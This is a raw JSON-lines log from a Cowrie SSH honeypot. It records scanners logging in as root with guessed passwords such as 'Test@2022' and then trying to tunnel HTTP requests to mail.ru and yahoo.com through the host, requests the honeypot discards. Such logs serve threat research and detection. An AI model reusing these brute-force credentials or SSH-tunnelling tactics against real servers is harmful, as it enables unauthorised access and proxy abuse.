{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:43.687204Z","src_ip":"77.83.207.83","session":"6dd6e23a3e1a"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:43:43.740248Z","src_ip":"77.83.207.83","session":"6dd6e23a3e1a"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":36127,"dst_ip":"1.2.3.4","dst_port":22,"session":"7d926124e54d","protocol":"ssh","message":"New connection: 77.83.207.83:36127 (1.2.3.4:22) [session: 7d926124e54d]","sensor":"my-vps","timestamp":"2025-08-31T03:43:43.790686Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:43:43.800593Z","src_ip":"77.83.207.83","session":"7d926124e54d"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:43:43.842952Z","src_ip":"77.83.207.83","session":"7d926124e54d"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:43:44.102076Z","src_ip":"77.83.207.83","session":"7d926124e54d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":18777,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:18777","sensor":"my-vps","timestamp":"2025-08-31T03:43:44.154931Z","session":"7d926124e54d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:44.206994Z","src_ip":"77.83.207.83","session":"7d926124e54d"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:43:44.222456Z","src_ip":"201.148.180.50","session":"756991504bd9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:43:44.223112Z","src_ip":"201.148.180.50","session":"756991504bd9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":7623,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:7623","sensor":"my-vps","timestamp":"2025-08-31T03:43:44.354266Z","session":"7d926124e54d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:44.406230Z","src_ip":"77.83.207.83","session":"7d926124e54d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":10783,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:10783","sensor":"my-vps","timestamp":"2025-08-31T03:43:44.550451Z","session":"7d926124e54d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:44.602369Z","src_ip":"77.83.207.83","session":"7d926124e54d"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:43:44.655068Z","src_ip":"77.83.207.83","session":"7d926124e54d"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":36208,"dst_ip":"1.2.3.4","dst_port":22,"session":"943f30e39d16","protocol":"ssh","message":"New connection: 77.83.207.83:36208 (1.2.3.4:22) [session: 943f30e39d16]","sensor":"my-vps","timestamp":"2025-08-31T03:43:44.705611Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:43:44.706966Z","src_ip":"77.83.207.83","session":"943f30e39d16"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:43:44.757949Z","src_ip":"77.83.207.83","session":"943f30e39d16"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:43:45.012592Z","src_ip":"77.83.207.83","session":"943f30e39d16"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":23030,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:23030","sensor":"my-vps","timestamp":"2025-08-31T03:43:45.064517Z","session":"943f30e39d16"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:45.115670Z","src_ip":"77.83.207.83","session":"943f30e39d16"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":7143,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:7143","sensor":"my-vps","timestamp":"2025-08-31T03:43:45.261333Z","session":"943f30e39d16"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:45.312448Z","src_ip":"77.83.207.83","session":"943f30e39d16"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":19543,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:19543","sensor":"my-vps","timestamp":"2025-08-31T03:43:45.457431Z","session":"943f30e39d16"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:45.508557Z","src_ip":"77.83.207.83","session":"943f30e39d16"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:43:45.560535Z","src_ip":"77.83.207.83","session":"943f30e39d16"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":36286,"dst_ip":"1.2.3.4","dst_port":22,"session":"5d296d2ff691","protocol":"ssh","message":"New connection: 77.83.207.83:36286 (1.2.3.4:22) [session: 5d296d2ff691]","sensor":"my-vps","timestamp":"2025-08-31T03:43:45.609629Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:43:45.619457Z","src_ip":"77.83.207.83","session":"5d296d2ff691"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:43:45.659963Z","src_ip":"77.83.207.83","session":"5d296d2ff691"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:43:45.909286Z","src_ip":"77.83.207.83","session":"5d296d2ff691"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":2914,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:2914","sensor":"my-vps","timestamp":"2025-08-31T03:43:45.960748Z","session":"5d296d2ff691"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:46.011166Z","src_ip":"77.83.207.83","session":"5d296d2ff691"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":32572,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:32572","sensor":"my-vps","timestamp":"2025-08-31T03:43:46.152911Z","session":"5d296d2ff691"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:46.203206Z","src_ip":"77.83.207.83","session":"5d296d2ff691"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57269,"dst_ip":"1.2.3.4","dst_port":22,"session":"8f16e4d74d82","protocol":"ssh","message":"New connection: 212.227.235.229:57269 (1.2.3.4:22) [session: 8f16e4d74d82]","sensor":"my-vps","timestamp":"2025-08-31T03:43:46.262977Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:43:46.264086Z","src_ip":"212.227.235.229","session":"8f16e4d74d82"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":20102,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:20102","sensor":"my-vps","timestamp":"2025-08-31T03:43:46.344398Z","session":"5d296d2ff691"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:46.395330Z","src_ip":"77.83.207.83","session":"5d296d2ff691"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57649,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f5fd33200cc","protocol":"ssh","message":"New connection: 212.227.235.229:57649 (1.2.3.4:22) [session: 0f5fd33200cc]","sensor":"my-vps","timestamp":"2025-08-31T03:43:46.426276Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:43:46.426973Z","src_ip":"212.227.235.229","session":"0f5fd33200cc"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:43:46.446017Z","src_ip":"77.83.207.83","session":"5d296d2ff691"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":36346,"dst_ip":"1.2.3.4","dst_port":22,"session":"32b88cdf1d0c","protocol":"ssh","message":"New connection: 77.83.207.83:36346 (1.2.3.4:22) [session: 32b88cdf1d0c]","sensor":"my-vps","timestamp":"2025-08-31T03:43:46.495440Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:43:46.496326Z","src_ip":"77.83.207.83","session":"32b88cdf1d0c"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:43:46.547719Z","src_ip":"77.83.207.83","session":"32b88cdf1d0c"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-31T03:43:46.587541Z","src_ip":"212.227.235.229","session":"0f5fd33200cc"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:43:46.798082Z","src_ip":"77.83.207.83","session":"32b88cdf1d0c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":14957,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:14957","sensor":"my-vps","timestamp":"2025-08-31T03:43:46.849262Z","session":"32b88cdf1d0c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:46.899506Z","src_ip":"77.83.207.83","session":"32b88cdf1d0c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":16004,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:16004","sensor":"my-vps","timestamp":"2025-08-31T03:43:47.040596Z","session":"32b88cdf1d0c"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:43:47.069120Z","src_ip":"212.227.235.229","session":"0f5fd33200cc"}
